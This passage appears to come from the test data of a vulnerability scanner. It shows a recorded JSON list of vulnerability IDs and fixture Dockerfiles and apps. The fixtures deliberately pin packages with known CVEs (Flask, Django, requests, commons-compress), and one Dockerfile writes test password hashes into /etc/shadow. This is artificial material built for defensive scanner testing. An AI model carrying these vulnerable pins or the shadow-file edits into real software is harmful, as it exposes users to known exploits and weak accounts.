"2026-02-10T04:49:46Z" } ] }, { "vulns": [ { "id": "GO-2022-0477", "modified": "2024-05-20T16:03:47Z" }, { "id": "GO-2022-0493", "modified": "2026-02-04T03:42:54.589715Z" }, { "id": "GO-2022-0515", "modified": "2024-05-20T16:03:47Z" }, { "id": "GO-2022-0520", "modified": "2024-05-20T16:03:47Z" }, { "id": "GO-2022-0521", "modified": "2024-05-20T16:03:47Z" }, { "id": "GO-2022-0522", "modified": "2024-05-20T16:03:47Z" }, { "id": "GO-2022-0523", "modified": "2024-05-20T16:03:47Z" }, { "id": "GO-2022-0524", "modified": "2024-05-20T16:03:47Z" }, { "id": "GO-2022-0525", "modified": "2024-05-20T16:03:47Z" }, { "id": "GO-2022-0526", "modified": "2024-05-20T16:03:47Z" }, { "id": "GO-2022-0527", "modified": "2024-05-20T16:03:47Z" }, { "id": "GO-2022-0531", "modified": "2024-05-20T16:03:47Z" }, { "id": "GO-2022-0532", "modified": "2024-05-20T16:03:47Z" }, { "id": "GO-2022-0533", "modified": "2024-05-20T16:03:47Z" }, { "id": "GO-2022-0537", "modified": "2024-05-20T16:03:47Z" }, { "id": "GO-2022-0969", "modified": "2026-02-04T02:41:02.475503Z" }, { "id": "GO-2022-1037", "modified": "2024-05-20T16:03:47Z" }, { "id": "GO-2022-1038", "modified": "2024-05-20T16:03:47Z" }, { "id": "GO-2022-1039", "modified": "2024-05-20T16:03:47Z" }, { "id": "GO-2022-1095", "modified": "2026-02-04T04:25:45.960420Z" }, { "id": "GO-2022-1143", "modified": "2026-02-04T04:08:13.589543Z" }, { "id": "GO-2022-1144", "modified": "2026-02-04T04:29:40.352025Z" }, { "id": "GO-2023-1568", "modified": "2026-02-04T02:54:08.789114Z" }, { "id": "GO-2023-1569", "modified": "2026-02-04T03:22:48.161542Z" }, { "id": "GO-2023-1570", "modified": "2026-02-04T02:57:33.465285Z" }, { "id": "GO-2023-1571", "modified": "2026-02-04T03:36:14.767832Z" }, { "id": "GO-2023-1621", "modified": "2026-02-04T02:47:06.125087Z" }, { "id": "GO-2023-1702", "modified": "2026-02-04T03:43:08.732164Z" }, { "id": "GO-2023-1703", "modified": "2026-02-04T04:24:15.366665Z" }, { "id": "GO-2023-1704", "modified": "2026-02-04T04:39:41.032390Z" }, { "id": "GO-2023-1705", "modified": "2026-02-04T03:44:01.631552Z" }, { "id": "GO-2023-1751", "modified": "2026-02-04T04:31:56.779446Z" }, { "id": "GO-2023-1752", "modified": "2026-02-04T03:50:58.841420Z" }, { "id": "GO-2023-1753", "modified": "2026-02-04T02:22:30.446388Z" }, { "id": "GO-2023-1840", "modified": "2026-02-04T03:48:08.792378Z" }, { "id": "GO-2023-1878", "modified": "2026-02-04T04:31:14.443108Z" }, { "id": "GO-2023-1987", "modified": "2026-02-04T03:58:58.871084Z" }, { "id": "GO-2023-2041", "modified": "2026-02-04T04:25:22.510281Z" }, { "id": "GO-2023-2043", "modified": "2026-02-04T04:11:02.549923Z" }, { "id": "GO-2023-2102", "modified": "2026-02-04T03:49:27.289895Z" }, { "id": "GO-2023-2185", "modified": "2026-02-04T02:59:25.590966Z" }, { "id": "GO-2023-2186", "modified": "2026-02-04T03:56:59.969208Z" }, { "id": "GO-2023-2375", "modified": "2026-02-04T03:57:11.083315Z" }, { "id": "GO-2023-2382", "modified": "2026-02-04T03:33:11.274886Z" }, { "id": "GO-2024-2598", "modified": "2026-02-04T03:12:08.722840Z" }, { "id": "GO-2024-2599", "modified": "2026-02-04T02:21:09.533216Z" }, { "id": "GO-2024-2600", "modified": "2026-02-04T02:34:41.672789Z" }, { "id": "GO-2024-2609", "modified": "2026-02-04T04:37:13.773873Z" }, { "id": "GO-2024-2610", "modified": "2026-02-04T03:09:18.870079Z" }, { "id": "GO-2024-2687", "modified": "2026-02-04T04:09:31.762399Z" }, { "id": "GO-2024-2887", "modified": "2026-01-28T03:27:17.746525Z" }, { "id": "GO-2024-2888", "modified": "2026-01-28T03:27:17.560343Z" }, { "id": "GO-2024-2963", "modified": "2026-02-04T03:37:39.895574Z" }, { "id": "GO-2024-3105", "modified": "2026-02-24T16:29:04.364011Z" }, { "id": "GO-2024-3106", "modified": "2026-02-24T16:29:04.606789Z" }, { "id": "GO-2024-3107", "modified": "2026-02-24T16:29:04.677030Z" }, { "id": "GO-2025-3373", "modified": "2026-02-17T16:13:53.362266Z" }, { "id": "GO-2025-3420", "modified": "2026-02-17T16:13:53.083304Z" }, { "id": "GO-2025-3447", "modified": "2026-02-04T04:23:04.020664Z" }, { "id": "GO-2025-3563", "modified": "2026-02-17T16:13:52.395126Z" }, { "id": "GO-2025-3750", "modified": "2026-02-04T03:28:12.135241Z" }, { "id": "GO-2025-3751", "modified": "2026-02-17T16:13:52.185280Z" }, { "id": "GO-2025-3849", "modified": "2026-02-04T02:26:50.866679Z" }, { "id": "GO-2025-3956", "modified": "2026-02-04T04:33:27.340869Z" }, { "id": "GO-2025-4006", "modified": "2026-02-17T16:13:53.018755Z" }, { "id": "GO-2025-4007", "modified": "2026-02-17T13:58:48.676604Z" }, { "id": "GO-2025-4008", "modified": "2026-02-17T13:58:48.077685Z" }, { "id": "GO-2025-4009", "modified": "2026-02-13T02:58:48.571208Z" }, { "id": "GO-2025-4010", "modified": "2026-02-13T21:28:48.362505Z" }, { "id": "GO-2025-4011", "modified": "2026-02-17T13:58:47.352598Z" }, { "id": "GO-2025-4012", "modified": "2026-02-17T13:58:47.721658Z" }, { "id": "GO-2025-4013", "modified": "2026-02-17T13:58:47.501939Z" }, { "id": "GO-2025-4014", "modified": "2026-03-18T11:44:08.816200Z" }, { "id": "GO-2025-4015", "modified": "2026-02-17T16:13:53.510662Z" }, { "id": "GO-2025-4155", "modified": "2026-03-18T11:44:08.473909Z" }, { "id": "GO-2025-4175", "modified": "2026-02-04T04:38:59.126121Z" }, { "id": "GO-2026-4337", "modified": "2026-03-18T11:44:08.657377Z" }, { "id": "GO-2026-4340", "modified": "2026-02-04T02:58:11.702669Z" }, { "id": "GO-2026-4341", "modified": "2026-03-18T11:44:08.749079Z" }, { "id": "GO-2026-4342", "modified": "2026-03-17T10:28:56.226379Z" }, { "id": "GO-2026-4403", "modified": "2026-02-06T09:40:56.765821Z" }, { "id": "GO-2026-4601", "modified": "2026-03-10T10:43:54.660319Z" }, { "id": "GO-2026-4602", "modified": "2026-03-10T10:43:54.463365Z" }, { "id": "GO-2026-4603", "modified": "2026-03-10T10:43:54.330461Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2022-3219", "modified": "2026-01-20T17:26:42.776809Z" }, { "id": "UBUNTU-CVE-2025-30258", "modified": "2026-02-04T04:30:17.426918Z" }, { "id": "UBUNTU-CVE-2025-68972", "modified": "2026-01-20T19:15:15.770361Z" }, { "id": "UBUNTU-CVE-2025-68973", "modified": "2026-02-05T00:30:28.335358Z" }, { "id": "USN-7412-1", "modified": "2026-02-10T04:47:47Z" }, { "id": "USN-7412-2", "modified": "2026-02-10T04:47:47Z" }, { "id": "USN-7946-1", "modified": "2026-02-10T04:50:47Z" } ] }, {}, {}, {}, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "USN-8091-1", "modified": "2026-03-13T23:29:29.779929Z" } ] }, {}, { "vulns": [ { "id": "UBUNTU-CVE-2016-20013", "modified": "2026-02-03T07:12:11.178156Z" }, { "id": "UBUNTU-CVE-2025-0395", "modified": "2026-02-06T21:35:29.229625Z" }, { "id": "UBUNTU-CVE-2025-15281", "modified": "2026-02-04T07:39:07.958164Z" }, { "id": "UBUNTU-CVE-2025-4802", "modified": "2026-02-04T04:09:49.871743Z" }, { "id": "UBUNTU-CVE-2025-8058", "modified": "2026-02-04T07:39:09.389770Z" }, { "id": "UBUNTU-CVE-2026-0861", "modified": "2026-02-04T07:39:03.415441Z" }, { "id": "UBUNTU-CVE-2026-0915", "modified": "2026-02-23T00:02:27.504192Z" }, { "id": "USN-7259-1", "modified": "2026-02-10T04:46:30Z" }, { "id": "USN-7541-1", "modified": "2026-02-10T04:48:59Z" }, { "id": "USN-7760-1", "modified": "2026-02-10T04:49:49Z" }, { "id": "USN-8005-1", "modified": "2026-02-23T00:13:53.339268Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2016-20013", "modified": "2026-02-03T07:12:11.178156Z" }, { "id": "UBUNTU-CVE-2025-0395", "modified": "2026-02-06T21:35:29.229625Z" }, { "id": "UBUNTU-CVE-2025-15281", "modified": "2026-02-04T07:39:07.958164Z" }, { "id": "UBUNTU-CVE-2025-4802", "modified": "2026-02-04T04:09:49.871743Z" }, { "id": "UBUNTU-CVE-2025-8058", "modified": "2026-02-04T07:39:09.389770Z" }, { "id": "UBUNTU-CVE-2026-0861", "modified": "2026-02-04T07:39:03.415441Z" }, { "id": "UBUNTU-CVE-2026-0915", "modified": "2026-02-23T00:02:27.504192Z" }, { "id": "USN-7259-1", "modified": "2026-02-10T04:46:30Z" }, { "id": "USN-7541-1", "modified": "2026-02-10T04:48:59Z" }, { "id": "USN-7760-1", "modified": "2026-02-10T04:49:49Z" }, { "id": "USN-8005-1", "modified": "2026-02-23T00:13:53.339268Z" } ] }, {}, { "vulns": [ { "id": "UBUNTU-CVE-2025-1390", "modified": "2026-02-04T04:28:50.933288Z" }, { "id": "USN-7287-1", "modified": "2026-02-10T04:47:15Z" } ] }, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "UBUNTU-CVE-2022-27943", "modified": "2026-02-25T19:00:26.332370Z" }, { "id": "UBUNTU-CVE-2023-4039", "modified": "2026-03-14T09:09:23.235151Z" }, { "id": "USN-7700-1", "modified": "2026-02-10T04:49:46Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2024-2236", "modified": "2026-01-20T17:51:42.649938Z" } ] }, {}, { "vulns": [ { "id": "UBUNTU-CVE-2024-12243", "modified": "2026-02-04T02:53:36.843010Z" }, { "id": "UBUNTU-CVE-2025-14831", "modified": "2026-02-28T05:58:56.935176Z" }, { "id": "UBUNTU-CVE-2025-32988", "modified": "2026-02-04T02:15:37.273955Z" }, { "id": "UBUNTU-CVE-2025-32989", "modified": "2026-02-04T03:37:18.739300Z" }, { "id": "UBUNTU-CVE-2025-32990", "modified": "2026-02-04T03:31:01.615385Z" }, { "id": "UBUNTU-CVE-2025-6395", "modified": "2026-02-04T03:31:22.603031Z" }, { "id": "UBUNTU-CVE-2025-9820", "modified": "2026-02-28T06:16:45.816014Z" }, { "id": "USN-7281-1", "modified": "2026-02-10T04:47:15Z" }, { "id": "USN-7635-1", "modified": "2026-02-10T04:49:34Z" }, { "id": "USN-8043-1", "modified": "2026-02-17T22:00:37.652199Z" } ] }, {}, { "vulns": [ { "id": "UBUNTU-CVE-2018-5709", "modified": "2025-10-24T04:46:51Z" }, { "id": "UBUNTU-CVE-2024-26458", "modified": "2026-02-04T03:00:45.815615Z" }, { "id": "UBUNTU-CVE-2024-26461", "modified": "2026-02-04T04:19:35.724133Z" }, { "id": "UBUNTU-CVE-2024-3596", "modified": "2026-02-04T04:28:06.065165Z" }, { "id": "UBUNTU-CVE-2025-24528", "modified": "2026-02-04T04:40:58.959893Z" }, { "id": "UBUNTU-CVE-2025-3576", "modified": "2026-02-04T02:50:47.063994Z" }, { "id": "USN-7257-1", "modified": "2026-02-10T04:46:30Z" }, { "id": "USN-7314-1", "modified": "2026-02-10T04:47:17Z" }, { "id": "USN-7542-1", "modified": "2026-02-10T04:48:59Z" } ] }, {}, {}, { "vulns": [ { "id": "UBUNTU-CVE-2018-5709", "modified": "2025-10-24T04:46:51Z" }, { "id": "UBUNTU-CVE-2024-26458", "modified": "2026-02-04T03:00:45.815615Z" }, { "id": "UBUNTU-CVE-2024-26461", "modified": "2026-02-04T04:19:35.724133Z" }, { "id": "UBUNTU-CVE-2024-3596", "modified": "2026-02-04T04:28:06.065165Z" }, { "id": "UBUNTU-CVE-2025-24528", "modified": "2026-02-04T04:40:58.959893Z" }, { "id": "UBUNTU-CVE-2025-3576", "modified": "2026-02-04T02:50:47.063994Z" }, { "id": "USN-7257-1", "modified": "2026-02-10T04:46:30Z" }, { "id": "USN-7314-1", "modified": "2026-02-10T04:47:17Z" }, { "id": "USN-7542-1", "modified": "2026-02-10T04:48:59Z" } ] }, {}, { "vulns": [ { "id": "UBUNTU-CVE-2018-5709", "modified": "2025-10-24T04:46:51Z" }, { "id": "UBUNTU-CVE-2024-26458", "modified": "2026-02-04T03:00:45.815615Z" }, { "id": "UBUNTU-CVE-2024-26461", "modified": "2026-02-04T04:19:35.724133Z" }, { "id": "UBUNTU-CVE-2024-3596", "modified": "2026-02-04T04:28:06.065165Z" }, { "id": "UBUNTU-CVE-2025-24528", "modified": "2026-02-04T04:40:58.959893Z" }, { "id": "UBUNTU-CVE-2025-3576", "modified": "2026-02-04T02:50:47.063994Z" }, { "id": "USN-7257-1", "modified": "2026-02-10T04:46:30Z" }, { "id": "USN-7314-1", "modified": "2026-02-10T04:47:17Z" }, { "id": "USN-7542-1", "modified": "2026-02-10T04:48:59Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2018-5709", "modified": "2025-10-24T04:46:51Z" }, { "id": "UBUNTU-CVE-2024-26458", "modified": "2026-02-04T03:00:45.815615Z" }, { "id": "UBUNTU-CVE-2024-26461", "modified": "2026-02-04T04:19:35.724133Z" }, { "id": "UBUNTU-CVE-2024-3596", "modified": "2026-02-04T04:28:06.065165Z" }, { "id": "UBUNTU-CVE-2025-24528", "modified": "2026-02-04T04:40:58.959893Z" }, { "id": "UBUNTU-CVE-2025-3576", "modified": "2026-02-04T02:50:47.063994Z" }, { "id": "USN-7257-1", "modified": "2026-02-10T04:46:30Z" }, { "id": "USN-7314-1", "modified": "2026-02-10T04:47:17Z" }, { "id": "USN-7542-1", "modified": "2026-02-10T04:48:59Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2025-62813", "modified": "2025-10-27T08:32:45.494712Z" } ] }, {}, { "vulns": [ { "id": "USN-8091-1", "modified": "2026-03-13T23:29:29.779929Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2023-50495", "modified": "2026-02-04T03:21:31.661318Z" }, { "id": "UBUNTU-CVE-2025-6141", "modified": "2026-01-20T18:35:03.980742Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2023-50495", "modified": "2026-02-04T03:21:31.661318Z" }, { "id": "UBUNTU-CVE-2025-6141", "modified": "2026-01-20T18:35:03.980742Z" } ] }, {}, {}, {}, { "vulns": [ { "id": "UBUNTU-CVE-2024-10041", "modified": "2026-01-20T19:07:32.667161Z" }, { "id": "UBUNTU-CVE-2025-6020", "modified": "2026-02-04T02:31:29.332885Z" }, { "id": "UBUNTU-CVE-2025-8941", "modified": "2026-01-20T18:46:31.526274Z" }, { "id": "USN-7580-1", "modified": "2026-02-10T04:49:00Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2024-10041", "modified": "2026-01-20T19:07:32.667161Z" }, { "id": "UBUNTU-CVE-2025-6020", "modified": "2026-02-04T02:31:29.332885Z" }, { "id": "UBUNTU-CVE-2025-8941", "modified": "2026-01-20T18:46:31.526274Z" }, { "id": "USN-7580-1", "modified": "2026-02-10T04:49:00Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2024-10041", "modified": "2026-01-20T19:07:32.667161Z" }, { "id": "UBUNTU-CVE-2025-6020", "modified": "2026-02-04T02:31:29.332885Z" }, { "id": "UBUNTU-CVE-2025-8941", "modified": "2026-01-20T18:46:31.526274Z" }, { "id": "USN-7580-1", "modified": "2026-02-10T04:49:00Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2024-10041", "modified": "2026-01-20T19:07:32.667161Z" }, { "id": "UBUNTU-CVE-2025-6020", "modified": "2026-02-04T02:31:29.332885Z" }, { "id": "UBUNTU-CVE-2025-8941", "modified": "2026-01-20T18:46:31.526274Z" }, { "id": "USN-7580-1", "modified": "2026-02-10T04:49:00Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2022-41409", "modified": "2025-10-24T04:53:52Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2017-11164", "modified": "2026-01-20T16:49:00.053545Z" } ] }, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "USN-8091-1", "modified": "2026-03-13T23:29:29.779929Z" } ] }, {}, { "vulns": [ { "id": "UBUNTU-CVE-2024-13176", "modified": "2026-03-09T11:29:11.736076Z" }, { "id": "UBUNTU-CVE-2024-41996", "modified": "2026-02-06T21:00:29.439853Z" }, { "id": "UBUNTU-CVE-2024-9143", "modified": "2026-03-09T11:29:50.088989Z" }, { "id": "UBUNTU-CVE-2025-15467", "modified": "2026-03-05T18:42:43.606385Z" }, { "id": "UBUNTU-CVE-2025-27587", "modified": "2026-02-06T21:55:03.879396Z" }, { "id": "UBUNTU-CVE-2025-68160", "modified": "2026-02-12T06:59:44.011039Z" }, { "id": "UBUNTU-CVE-2025-69418", "modified": "2026-02-06T22:01:44.179826Z" }, { "id": "UBUNTU-CVE-2025-69419", "modified": "2026-02-12T06:59:40.921557Z" }, { "id": "UBUNTU-CVE-2025-69420", "modified": "2026-02-12T06:58:38.833674Z" }, { "id": "UBUNTU-CVE-2025-69421", "modified": "2026-03-02T12:02:19.670699Z" }, { "id": "UBUNTU-CVE-2025-9230", "modified": "2026-03-09T12:25:45.048270Z" }, { "id": "UBUNTU-CVE-2026-22795", "modified": "2026-02-12T06:58:35.942634Z" }, { "id": "UBUNTU-CVE-2026-22796", "modified": "2026-02-12T06:59:02.005868Z" }, { "id": "UBUNTU-CVE-2026-2673", "modified": "2026-03-18T08:04:38.900604Z" }, { "id": "USN-7278-1", "modified": "2026-02-10T04:47:15Z" }, { "id": "USN-7786-1", "modified": "2026-02-10T04:50:09Z" }, { "id": "USN-7980-1", "modified": "2026-03-02T11:56:15.392710Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2022-27943", "modified": "2026-02-25T19:00:26.332370Z" }, { "id": "UBUNTU-CVE-2023-4039", "modified": "2026-03-14T09:09:23.235151Z" }, { "id": "USN-7700-1", "modified": "2026-02-10T04:49:46Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2023-7008", "modified": "2025-10-09T04:59:16Z" }, { "id": "UBUNTU-CVE-2025-4598", "modified": "2026-02-04T02:49:04.264249Z" }, { "id": "UBUNTU-CVE-2026-4105", "modified": "2026-03-18T08:05:12.098241Z" }, { "id": "USN-7559-1", "modified": "2026-02-10T04:48:59Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2021-46848", "modified": "2026-02-12T06:44:04.921097Z" }, { "id": "UBUNTU-CVE-2024-12133", "modified": "2026-02-12T06:31:24.332995Z" }, { "id": "UBUNTU-CVE-2025-13151", "modified": "2026-02-12T06:43:59.770392Z" }, { "id": "USN-7275-1", "modified": "2026-02-10T04:46:30Z" }, { "id": "USN-7954-1", "modified": "2026-02-10T04:50:47Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2023-50495", "modified": "2026-02-04T03:21:31.661318Z" }, { "id": "UBUNTU-CVE-2025-6141", "modified": "2026-01-20T18:35:03.980742Z" } ] }, {}, {}, { "vulns": [ { "id": "UBUNTU-CVE-2023-7008", "modified": "2025-10-09T04:59:16Z" }, { "id": "UBUNTU-CVE-2025-4598", "modified": "2026-02-04T02:49:04.264249Z" }, { "id": "UBUNTU-CVE-2026-4105", "modified": "2026-03-18T08:05:12.098241Z" }, { "id": "USN-7559-1", "modified": "2026-02-10T04:48:59Z" } ] }, {}, { "vulns": [ { "id": "USN-8091-1", "modified": "2026-03-13T23:29:29.779929Z" } ] }, {}, { "vulns": [ { "id": "UBUNTU-CVE-2022-4899", "modified": "2025-09-08T16:49:53Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2023-29383", "modified": "2025-10-24T05:01:54Z" }, { "id": "UBUNTU-CVE-2024-56433", "modified": "2026-01-20T18:02:13.226633Z" } ] }, {}, {}, {}, { "vulns": [ { "id": "USN-8091-1", "modified": "2026-03-13T23:29:29.779929Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2023-50495", "modified": "2026-02-04T03:21:31.661318Z" }, { "id": "UBUNTU-CVE-2025-6141", "modified": "2026-01-20T18:35:03.980742Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2023-50495", "modified": "2026-02-04T03:21:31.661318Z" }, { "id": "UBUNTU-CVE-2025-6141", "modified": "2026-01-20T18:35:03.980742Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2023-29383", "modified": "2025-10-24T05:01:54Z" }, { "id": "UBUNTU-CVE-2024-56433", "modified": "2026-01-20T18:02:13.226633Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2023-31486", "modified": "2025-10-24T05:01:58Z" }, { "id": "UBUNTU-CVE-2023-47039", "modified": "2025-10-24T05:02:19Z" }, { "id": "UBUNTU-CVE-2024-56406", "modified": "2026-02-04T02:50:55.689079Z" }, { "id": "UBUNTU-CVE-2025-40909", "modified": "2026-02-04T02:15:05.324531Z" }, { "id": "USN-7434-1", "modified": "2026-02-10T04:47:48Z" }, { "id": "USN-7678-1", "modified": "2026-02-10T04:49:41Z" } ] }, {}, {}, {}, {}, { "vulns": [ { "id": "UBUNTU-CVE-2025-45582", "modified": "2026-01-20T18:59:29.811906Z" } ] }, {}, {}, { "vulns": [ { "id": "USN-8091-1", "modified": "2026-03-13T23:29:29.779929Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2026-27171", "modified": "2026-02-27T09:59:13Z" } ] } ] } headers: Content-Length: - "17153" Content-Type: - application/json status: 200 OK code: 200 duration: 0s ================================================ FILE: cmd/osv-scanner/scan/image/testdata/java-fixture/app/osv-scanner.toml ================================================ [[PackageOverrides]] ignore = true ================================================ FILE: cmd/osv-scanner/scan/image/testdata/java-fixture/app/pom.xml ================================================ 4.0.0 com.mycompany.app my-app 1.0-SNAPSHOT my-app https://osv.dev org.apache.hadoop hadoop-client 3.4.0 org.apache.commons commons-compress 1.21 maven-assembly-plugin com.mycompany.app.App jar-with-dependencies make-assembly package single 1.8 1.8 ================================================ FILE: cmd/osv-scanner/scan/image/testdata/java-fixture/app/src/main/java/com/mycompany/app/App.java ================================================ package com.mycompany.app; /** * Hello world! * */ public class App { public static void main( String[] args ) { System.out.println( "Hello World!" ); } } ================================================ FILE: cmd/osv-scanner/scan/image/testdata/lockfile-fixture/alpine-zlib-16.cdx.json ================================================ { "$schema": "http://cyclonedx.org/schema/bom-1.6.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.6", "version": 1, "metadata": { "timestamp": "2025-07-08T05:23:38Z", "tools": { "components": [ { "type": "application", "name": "SCALIBR", "externalReferences": [ { "url": "https://github.com/google/osv-scalibr", "type": "website" } ] } ] }, "authors": [ {} ], "component": { "bom-ref": "a5add6de-55de-40a9-aa0d-1f03de5ab308", "type": "", "name": "" } }, "components": [ { "bom-ref": "6756e583-83d8-4a08-a573-d2e9506cbd93", "type": "library", "name": "zlib", "version": "1.2.12-r1", "purl": "pkg:apk/alpine/zlib@1.2.12-r1?arch=x86_64\u0026distro=3.22.0\u0026origin=zlib", "evidence": { "occurrences": [ { "location": "lib/apk/db/installed" } ] } } ] } ================================================ FILE: cmd/osv-scanner/scan/image/testdata/lockfile-fixture/osv-scanner.toml ================================================ [[PackageOverrides]] ignore = true ================================================ FILE: cmd/osv-scanner/scan/image/testdata/package-tracing-fixture/go.mod ================================================ module ptf go 1.22.4 require github.com/BurntSushi/toml v1.4.0 ================================================ FILE: cmd/osv-scanner/scan/image/testdata/package-tracing-fixture/go.sum ================================================ github.com/BurntSushi/toml v1.4.0 h1:kuoIxZQy2WRRk1pttg9asf+WVv6tWQuBNVmK8+nqPr0= github.com/BurntSushi/toml v1.4.0/go.mod h1:ukJfTF/6rtPPRCnwkur4qwRxa8vTRFBF0uk2lLoLwho= ================================================ FILE: cmd/osv-scanner/scan/image/testdata/package-tracing-fixture/main.go ================================================ package main import ( "os" "github.com/BurntSushi/toml" ) func main() { toml.NewEncoder(os.Stdout) } ================================================ FILE: cmd/osv-scanner/scan/image/testdata/package-tracing-fixture/osv-scanner.toml ================================================ [[PackageOverrides]] ignore = true ================================================ FILE: cmd/osv-scanner/scan/image/testdata/python-fixture/main.py ================================================ def main(): return 'Hello, World!' if __name__ == '__main__': main() ================================================ FILE: cmd/osv-scanner/scan/image/testdata/python-fixture/osv-scanner.toml ================================================ [[PackageOverrides]] ignore = true ================================================ FILE: cmd/osv-scanner/scan/image/testdata/python-fixture/requirements.txt ================================================ flask==0.12.2 # Vulnerable to CVE-2019-1010083 django==1.11.29 # Vulnerable to CVE-2021-35042 requests==2.20.0 # Vulnerable to CVE-2018-18074 # Transitive deps certifi==2025.11.12 chardet==3.0.4 click==8.1.8 Django==1.11.29 Flask==0.12.2 idna==2.7 itsdangerous==2.2.0 Jinja2==3.1.6 MarkupSafe==3.0.3 pytz==2025.2 requests==2.20.0 urllib3==1.24.3 Werkzeug==3.1.4 ================================================ FILE: cmd/osv-scanner/scan/image/testdata/test-alpine-etcshadow.Dockerfile ================================================ FROM alpine:3.10@sha256:451eee8bedcb2f029756dc3e9d73bab0e7943c1ac55cff3a4861c52a0fdd3e98 RUN echo 'user-bcrypt:$2b$05$IYDlXvHmeORyyiUwu8KKuek2LE8VrxIYZ2skPvRDDNngpXJHRq7sG' >> /etc/shadow RUN echo 'user-descrypt:chERDiI95PGCQ' >> /etc/shadow ================================================ FILE: cmd/osv-scanner/scan/image/testdata/test-alpine-sbom.Dockerfile ================================================ FROM alpine:3.10@sha256:451eee8bedcb2f029756dc3e9d73bab0e7943c1ac55cff3a4861c52a0fdd3e98 COPY lockfile-fixture/alpine-zlib-16.cdx.json /data/alpine-zlib-16.cdx.json ================================================ FILE: cmd/osv-scanner/scan/image/testdata/test-alpine.Dockerfile ================================================ FROM alpine:3.10@sha256:451eee8bedcb2f029756dc3e9d73bab0e7943c1ac55cff3a4861c52a0fdd3e98 # Switch the version to 3.18 to show the advisories published for the latest alpine versions COPY "alpine-3.18-alpine-release" "/etc/alpine-release" COPY "alpine-3.18-os-release" "/etc/os-release" ================================================ FILE: cmd/osv-scanner/scan/image/testdata/test-go-binary.Dockerfile ================================================ FROM golang:1.22.4-alpine3.20@sha256:ace6cc3fe58d0c7b12303c57afe6d6724851152df55e08057b43990b927ad5e8 AS build COPY package-tracing-fixture/ /work RUN cd /work && go get github.com/BurntSushi/toml@v1.4.0 && go mod tidy RUN cd /work && go build . RUN cp /work/ptf /work/ptf-1.4.0 FROM alpine:3.20.1@sha256:b89d9c93e9ed3597455c90a0b88a8bbb5cb7188438f70953fede212a0c4394e0 COPY --from=build /work/ptf-1.4.0 /go/bin/ ================================================ FILE: cmd/osv-scanner/scan/image/testdata/test-image-with-deprecated/Cargo.toml ================================================ [package] name = "rust_novuln_deprecated" version = "0.1.0" edition = "2021" [dependencies] url = "2.5.3" # This is a deprecated (yanked) version ================================================ FILE: cmd/osv-scanner/scan/image/testdata/test-image-with-deprecated/src/main.rs ================================================ use url::Url; fn main() { let _ = Url::parse("https://google.com"); // Just something to make sure the url crate is in the binary println!("Hello, world!"); } ================================================ FILE: cmd/osv-scanner/scan/image/testdata/test-image-with-deprecated.Dockerfile ================================================ FROM rust:1.91.1-alpine3.22@sha256:8efbfb788786eeb127adc581394349c5fb567712156e0f8c2e499acadbc23756 AS builder RUN cargo install cargo-auditable WORKDIR /app COPY test-image-with-deprecated/ . # Build project with auditable as per doc RUN cargo auditable build --release FROM alpine:3.22.2@sha256:4b7ce07002c69e8f3d704a9c5d6fd3053be500b7f1c69fc0d80990c2ad8dd412 COPY --from=builder /app/target/release/rust_novuln_deprecated /app/rust_novuln_deprecated ================================================ FILE: cmd/osv-scanner/scan/image/testdata/test-java-full.Dockerfile ================================================ # Use the official OpenJDK image as the base image # TODO: This has been deprecated and we might want to switch to another image FROM openjdk:25-jdk-slim@sha256:34f10f3a1a5b638184ebd1c5c1b4aa4c49616ae3e5c1e845f0ac18c5332b5c6f RUN apt update && apt install -y maven # Set the working directory inside the container WORKDIR /app # Copy the project files into the container COPY ./java-fixture/app . # Download dependencies with maven RUN mvn clean package FROM eclipse-temurin:21-jre-alpine-3.21@sha256:7832115c38e9359db1156f94f9228fdf1341388f17dbd9df6c45727d233d1f5f WORKDIR /app COPY --from=0 /app/target/my-app-1.0-SNAPSHOT-jar-with-dependencies.jar target.jar # Set the entry point to run the JAR file ENTRYPOINT ["java", "-jar", "target.jar"] ================================================ FILE: cmd/osv-scanner/scan/image/testdata/test-node_modules-npm-empty.Dockerfile ================================================ FROM node:20-alpine@sha256:c0a3badbd8a0a760de903e00cedbca94588e609299820557e72cba2a53dbaa2c ARG MANAGER_VERSION="10.2.4" WORKDIR /prod/app # install the desired package manager RUN npm i -g "npm@$MANAGER_VERSION" # initialize the package.json using the manager RUN npm init -y # ensure that we finish fully installed RUN npm install ================================================ FILE: cmd/osv-scanner/scan/image/testdata/test-node_modules-npm-full.Dockerfile ================================================ FROM node:20-alpine@sha256:c0a3badbd8a0a760de903e00cedbca94588e609299820557e72cba2a53dbaa2c ARG MANAGER_VERSION="10.2.4" WORKDIR /prod/app # install the desired package manager RUN npm i -g "npm@$MANAGER_VERSION" # initialize the package.json using the manager RUN npm init -y # install a few dependencies at specific versions RUN npm i mkdirp@0.5.0 RUN npm i -d cryo@0.0.6 # ensure that we finish fully installed RUN npm install ================================================ FILE: cmd/osv-scanner/scan/image/testdata/test-node_modules-pnpm-empty.Dockerfile ================================================ FROM node:20-alpine@sha256:c0a3badbd8a0a760de903e00cedbca94588e609299820557e72cba2a53dbaa2c ARG MANAGER_VERSION="8.15.4" WORKDIR /prod/app # install the desired package manager RUN npm i -g 